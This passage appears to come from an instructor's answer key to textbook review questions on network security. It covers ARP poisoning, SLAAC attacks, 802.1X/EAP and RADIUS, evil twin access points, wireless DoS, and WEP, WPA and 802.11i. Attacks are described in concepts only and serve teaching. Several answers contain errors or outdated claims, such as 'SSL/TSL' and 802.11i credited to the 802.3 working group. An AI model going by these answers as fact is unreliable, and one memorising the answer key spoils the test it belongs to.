Yes, after the attacker has successfully rerouted host traffic, it needs to reroute the traffic coming to, and from, the gateway. It uses a similar spoofed ARP reply to poison the gateway. The attacker sends a continuous stream of spoofed ARP replies to the gateway telling it that all other internal hosts are at C3-C3-C3-C3-C3-C3 (Step 3).
e) Why does all network traffic go through the attacker after poisoning the network?
If the attacker has successfully used spoofed ARP replies to record false entries in the ARP tables for all internal hosts and the gateway. All traffic sent from internal hosts to the gateway will go to the attacker (Step 4). All traffic from the gateway will also go through the attacker and is now redirected through his computer as part of a MITM attack (Step 5).
ARP DoS Attack
Preventing ARP Poisoning
8. a) How can ARP poisoning be used as a DoS attack?
Spoofed ARP replies can be used to stop all traffic on the local network as part of an ARP DoS attack. The attacker sends all internal hosts a continuous stream of unsolicited spoofed ARP replies saying the gateway (10.0.0.4) is at E5-E5-E5-E5-E5-E5 (Step 1). Hosts record the gateway’s IP address and nonexistent MAC address (Step 2).
b) How can static IP and ARP tables be used to prevent ARP poisoning?
ARP poisoning can be prevented by using static IP tables and static ARP tables. Static ARP tables are manually set and cannot be dynamically updated using ARP. Each computer has a known static IP address that does not change. All hosts on the LAN know which IP address is assigned to each MAC address (host).
c) Can static IP and ARP tables be effectively used in large networks? Why not?
Most organizations are too large, change too quickly, and lack the experience to effectively manage static IP and ARP tables. The workload would be overwhelming.
d) Why would limiting local access prevent DoS attacks?
Limiting local access would prevent ARP DoS attacks because foreign hosts would not be able to send packets to internal hosts.
SLAAC Attack
9. a) What is a SLAAC attack?
A Stateless Address Auto Configuration (SLAAC) attack is an attack on the functionality and confidentiality of a network. This attack occurs when a rogue IPv6 router is introduced to an IPv4 network. All traffic is automatically rerouted through the IPv6 router, creating the potential for a MITM attack.
b) Why do host automatically prefer IPv6 addressing?
Traffic on the existing IPv4 network is rerouted through the rogue IPv6 router because all newer operating systems are configured by default to prefer IPv6 networks. Microsoft Windows 7, Microsoft Server 2008, and Apple OS X all ship with IPv6 fully enabled.
c) What has to be introduced to a network for a SLAAC attack to work?
With the physical introduction of a rogue IPv6 router all internal traffic is automatically rerouted (Step 1). This happens because the rogue router advertises its presence on the network using Router Advertisement (RA) messages over ICMPv6 (Step 2). Hosts receive RAs and automatically derive their IPv6 address using a process called Stateless Address Auto Configuration (SLAAC).
d) Would a SLAAC attack work on an existing IPv6 network? Why not?
No, the attack would only work on existing IPv4 networks. If the attack were tried on an existing IPv6 network the network administrator would immediately see conflicts. The network administrator could also assign a specific (legitimate) internal DHCP server (IPv6) to each host.
e) Could a rogue router direct internal traffic to an outside rogue DNS server? How?
Yes, the rogue router can assign a false DNS server to internal hosts as part of the SLAAC attack. A false DNS server would allow an attacker to redirect all internal traffic to any number of phishing sites.
4.4 Access Control for Networks
LAN Connections
10. a) What is the main access threat to Ethernet LANs?
Traditionally, Ethernet LANs offered no access security. Any intruder who entered a corporate building could walk up to any wall jack and plug in a notebook computer. The intruder would then have unfettered access to the LAN’s computers, bypassing the site’s border firewall. This was a complete breakdown in access control.
b) What is the main access threat to 802.11 wireless LANs?
An intruder can connect by radio to an unprotected wireless access point.
c) Why is the access threat to WLANs more severe?
The intruder does not even have to enter the building as he or she needs to do in wired LANs. In WLANs, attackers can connect to unprotected (or poorly protected) wireless access points and bypass border router security from outside of the physical premises of the company.
d) Is eavesdropping usually more of a concern for wired LANs, wireless LANs, or both?
It is a concern in both, but it is a rare concern in wired LANs and a common concern with wireless LANs.
4.5 Ethernet Security
Ethernet and 802.1X
11. a) Why is 802.1X called Port-Based Access Control?
802.1X is called port-based access control because security is implemented on specific ports of an Ethernet workgroup switch.
b) Where is the heavy authentication work done?
The heavy authentication work is done on a central authentication server, rather than on the switch.
c) What are the three benefits of using a central authentication server?
Reduced cost: Having a central authentication server reduces the work required to maintain multiple authentication databases updated, as well as reduces the authentication processing on individual switches.
Consistency: Credentials are checked against the same authentication database every time, versus relying on possibly outdated authentication databases residing on switches throughout the network.
Immediacy: Central authentication allows the ability to rapidly change access controls, especially important when trying to restrict access to a recently fired employee or rogue PC that may be negatively impacting the network.
d) Which device is the verifier? Explain. (Trick question.)
There is no verifier in 802.1X. Instead, the verifier responsibilities are shared between the workgroup switch, known as the authenticator, and the central authentication server.
e) Which device is called the authenticator?
The workgroup switch is called the authenticator.
The Extensible Authentication Protocol (EAP)
12. a) How does an EAP session start?
When a switch senses a connection, it sends an EAP Start message to the RADIUS server. This begins the EAP session.
b) What types of messages carry requests for authentication information and responses to these requests?
EAP request and response messages.
c) Describe how the central authentication server tells the authenticator that the supplicant is acceptable.
It sends an EAP accept message if the supplicant is acceptable, but it sends an EAP failure message if the supplicant is not.
d) How does the authenticator pass this information on to the supplicant?
How the authenticator notifies the client of authentication success or failure is outside the scope of EAP.
e) In what sense is EAP extensible?
EAP is considered extensible because it is easy to add new authentication methods to EAP (such as smart cards, MS-CHAP, Diffie–Helman, etc.) without modification of the general format of the underlying EAP messages, just the contents are modified by the authentication method chosen.
f) When a new authentication method is added, what device software must be changed to use the new method?
When a new authentication method is added, the central authentication server and supplicant both need to implement the new method.
g) Why is there no need to change the operation of the authenticator when a new EAP authentication method is added, or an old EAP authentication mode is dropped?
The software on the authenticator (workgroup switch) does not have to be changed. It merely passes request and response messages through. This is good because a network will have many workgroup switches.
h) Why is this freedom from the need to make changes in the switch beneficial?
The freedom to make changes in authentication protocols is beneficial because it reduces costs that would normally be associated with upgrading authenticators if they were tied to specific authentication methods.
RADIUS Servers
13. a) What standard do most central authentication servers follow?
Most central authentication servers are governed by the RADIUS standard.
b) How are EAP and RADIUS related in terms of functionality?
RADIUS is an AAA server that uses EAP for authentication.
c) What authentication method does RADIUS use?
EAP
4.6 Wireless Security
Wireless Attacks
14. a) What is the most common attack against wireless networks? Why?
The most common attack against wireless networks is unauthorized access, or connecting to a network without permission.
b) Which IEEE standard governs WLAN transmission?
IEEE 802.11.
c) Which device acts as a relay between wired and wireless networks?
An access point.
d) What is the typical range of a WLAN?
Wireless 802.11 networks typically have a range of 30 to 100 meters extending in all directions from the AP.
e) What is the difference between an open network and a private network?
Open networks can be legally accessed by anyone, but private networks that do not allow access unless specifically authorized.
f) Who would set up a rogue access point? Why?
Rogue access points are unauthorized access points set up by individuals or departments with little or no security. They are typically set up by internal employees for convenience, without knowing the ramifications of an unsecured wireless AP.
g) Give examples of both internal and external harm caused by unauthorized wireless access.
Internally, attackers have greater access to internal information, resources, and other network traffic. They can covertly steal confidential information, read and record network traffic, alter network devices, or plant malware on targeted clients or servers. They may also have access to network shares that were assumed to be protected behind the firewall.
An attacker could anonymously download, upload, and store illegal content via the wireless network. Even worse, the network could be used as a launching pad for an external attack.
h) Are you liable if someone else uses your wireless network to commit a crime? Why, or why not?
At the time of this writing, it appears that you are likely not liable for crimes committed by criminals using your wireless network—if you attempted to secure it. However, it’s unknown if you could be liable for criminal acts performed through an unprotected network. In either case, your ISP can immediately discontinue your service.
Evil Twin Access Points
15. a) What man-in-the-middle attack is a danger for 802.11 WLANs?
The most dangerous man-in-the-middle attack for 802.11 WLANs is the evil twin access point. An evil twin access point is simply a PC that has software that allows it to masquerade as a legitimate access point. The evil twin will pass traffic to legitimate access points transparently, retaining copies of important data sent from the host and legitimate access point. Evil twin access points can intercept messages during and after security setup, allowing the evil twin to have the necessary keys to decrypt all traffic during a specific session.
b) Physically, what is an evil twin access point?
An evil twin access point is simply a PC that has software to allow it to masquerade as an access point.
c) What happens when the legitimate supplicant sends credentials to the legitimate access point?
The evil twin access point will intercept all traffic passing through it, including credentials and keys which will later on give it permission to decrypt and encrypt any messages passing through.
d) In what two types of attacks can the evil twin engage?
It can capture credentials transmissions and keys and it can also send packets of its own impersonating the victim client.
e) Are evil twin attacks frequent?
Yes
f) Where are they the most frequently encountered?
In public hot spots.
g) How can the danger of evil twin attacks be addressed?
The danger of evil twin attacks can be eliminated by requiring remote clients to establish VPN connections with VPN gateways prior to gaining access to network resources. Remote access VPN connection setup requires a pre-shared key on the client and VPN gateway, and this pre-shared key is never transmitted during authentication, thus defeating the evil twin’s ability to copy credentials and keying information.
Wireless Denial of Service
16. a) How would a wireless DoS attack be carried out?
Wireless DoS attacks can be carried out by 1) flooding the frequency being used, 2) flooding the AP with too many packets, and 3) continually sending “disassociate” packets to all internal wireless clients.
b) What type of devices could be used to flood the transmission frequency for a WLAN?
Attackers can use common household items such as baby monitors, cordless phones, or Bluetooth devices to interfere with an 802.11 network. Attackers can also use commercial jamming devices.
c) What device could be used to identify a DoS flood if the entire frequency is being flooded by EMI?
Network administrators can use wireless spectrum analyzers to identify DoS floods. Spectrum analyzers record all signals, including packet transmissions, within a given radio frequency band.
d) What type of attack commands could be sent to cause a wireless DoS attack?
An Attacker could use packet injection to send spoofed deauthenticate messages to the AP. The spoofed source addresses would correspond to each wireless client on the WLAN. The deauthenticate message says that the sender wants to terminate the authenticated connection. The victim must reauthenticate with the AP before it can communicate.
e) What would happen if a wireless network were flooded with CTS frames?
A flood of CTS frames with long transmission durations keeps other clients waiting. A flood of RTS frames produces a flood of CTS frames. Both produce an effective DoS attack on the wireless network. Again, these messages are not authenticated.
Wireless LAN Security with 802.11i
17. a) Why is it impossible to extend 802.1X operation using EAP directly to WLANs?
EAP assumes that the connection between the supplicant and authenticator is secure, which is not the case in wireless transmission. Thus, 802.1X operation using EAP cannot be directly extended to WLANs.
b) What standard did the 802.3 Working Group create to extend 802.1X operation to WLANs with security for EAP?
802.11i
c) For 802.11i, distinguish between outer and inner authentication.
Outer authentication in 802.11i consists of the client authenticating itself to the access point by establishing an SSL/TSL connection. Inner authentication follows outer authentication and occurs when the wireless client authentications itself with the central authentication server using EAP, within the protection of SSL/TLS.
d) What authentication method or methods does outer authentication use?
Outer authentication uses SSL/TSL.
e) What two extended EAP protocols are popular today?
EAP/TLS and PEAP.
f) Distinguish between their options for inner authentication.
For EAP/TLS, the inner authentication also uses TLS. For PEAP, the client can use any method specified in the EAP standard, ranging from passwords through digital certificates.
g) Is 802.11i security strong? Explain.
802.11i security is very strong. 802.11i not only provides authentication, but it supplies all of the protections expected in a strong cryptographic security system. By using 128bit AES, 802.11i ensures a robust symmetric encryption cipher for confidentiality. 802.11i also uses the strong AES-CCMP standard for automatic and frequent rekeying.
Core Wireless Security Protocols
Wired Equivalent Privacy (WEP)
18. a) What was the first core wireless security standard?
Wired equivalent privacy (WEP).
b) What encryption algorithm does it use?
WEP uses RC4.
c) Why are permanent shared keys undesirable?
Permanent shared keys are undesirable because in large firms that have many access points sharing the same WEP key, the practical difficulties in changing everyone’s key means that shared keys are almost never changed. In addition, because “everybody knows” the key, people share the key freely even when they are told not to. Worst of all, if a company fires a disgruntled employee, it must change the key on every access point for which the employee may know the key. In many cases, changing the key will be prohibitively expensive and would inconvenience many workers.
d) What per-frame key does a WEP computer or access point use to encrypt when it transmits?
WEP encrypts each frame with a per-frame key that consists of the shared RC4 key plus a 24-bit initialization vector (IV) that is different for each frame.
e) What mistake did the 802.11 Working Group make in selecting the length of the IV?
The 802.11 Working Group’s mistake was making IVs too short (only 24 bits long).
f) How long may WEP take to crack today?
If a company encrypts a large enough volume of traffic with the same secret key, the attacker can often compute the entire secret key in two or three minutes.
g) Should corporations today use WEP for security today?
No. Given how easily and quickly WEP can be cracked, it makes no sense for corporations to use WEP today. In fact, it only gives a false sense of security, and this may be worse than no security at all.
Wi-Fi Protected Access (WPA™)
19. a) What prompted the Wi-Fi Alliance to create WPA?
The inadequacy of WEP (which can be cracked in minutes) caused many companies to freeze WLAN deployment and in some cases turn off existing WLANs. This wide scale lack of trust in WLAN security prompted the Wi-Fi Alliance to create WPA.
b) Compare WPA and 802.11i security.
WPA uses the relatively weak RC4 cipher in encryption for confidentiality and uses the only moderately strong Temporal Key Integrity Protocol (TKIP) for keying and rekeying. Although there have been no published cracks for WPA as a whole, at least at the time of this writing, TKIP has been partially cracked, and security professionals are uncomfortable with WPA’s security methods.
c) What does the Wi-Fi Alliance call 802.11i?
WPA2
d) Despite its relatively security weaknesses, why do many companies continue to use WPA instead of 802.11i?
Companies still use WPA instead of WPA2 to avoid the cost of reconfiguring all access points and wireless clients to support WPA2.
Pre-Shared Key (PSK) Mode
20. a) Why is 802.1X mode unsuitable for homes and small offices?
Because the use of a central authentication server is very expensive.
b) What mode was created for homes or very small businesses with a single access point?
PSK/personal mode
c) How do users in this mode authenticate themselves to the access point?
In the PSK mode, users authenticate themselves to the access point via the use of a single, shared initial key.
d) Why is using a shared initial key not dangerous?
This key is used only briefly—when a client first authenticates itself to the access point. The access point sends the client a session key for use during the session. With only a few messages transmitted using the shared initial key, it is impossible for a cryptanalyst to discover the shared initial key.
e) How are PSK/personal keys generated?
The administrator types a passphrase into every client and into the access point.
f) How long must passphrases be for adequate security?
Passphrases must be at least 20 characters long for adequate security, but preferably greater than 20 characters.
Wireless Intrusion Detection Systems
21. a) What is the purpose of a wireless IDS?
It is to collect data from wireless access points that can be used to detect attacks.
b) How do wireless IDSs get their data?
In a centralized wireless intrusion detection system, each access point becomes a wireless IDS agent, sending appropriate information to the central wireless IDS console. The console transfers the data to an IDS database. It also sorts through data in the database to find indications of problems.
c) What is a rogue access point?
Unauthorized access points set up by individuals or departments.
d) What are the two alternatives to using a centralized wireless IDS?
One is not to worry about intrusion detection and the other is to walk around the building frequently with a laptop that has wireless IDS software.
e) Why are they not attractive?
Ignoring threats raises the probability that they will be successful. Walking around is likely to require a prohibitive amount of labor, and it cannot catch threats that appear after the wireless security administrator has checked a part of the site for threats. Nor are they likely to catch evil twin access points, which only operate occasionally and so may not be operating when the wireless administrator is sweeping the building for concerns.
False 802.11 Security Measures
22. a) Does the use of spread spectrum transmission in 802.11 create security?
No. Military transmission uses spread spectrum operation in a way that provides security. Civilian spread spectrum transmission does not.
b) What are SSIDs?
Each access point has a Service Set Identifier (SSID) that acts as the access point’s address. Clients must know the SSID to connect to the access point.
c) Does turning off SSID broadcasting offer real security? Explain.
No. Turning off SSID broadcasting would seem to offer security. However, even if SSID broadcasting is turned off, the SSID will still be transmitted in the clear in the header of each transmitted frame. Hacker software can read the SSID easily.
d) What are MAC access control lists?
A MAC access control list is a list of pre-approved stations allowed to use the access point.
e) Do they offer real security? Explain.
MAC access control lists rely on MAC addresses that are transmitted in the clear for every 802.11 frame. MAC addresses can be sniffed and spoofed by hackers. Thus, MAC access control lists offer no significant security.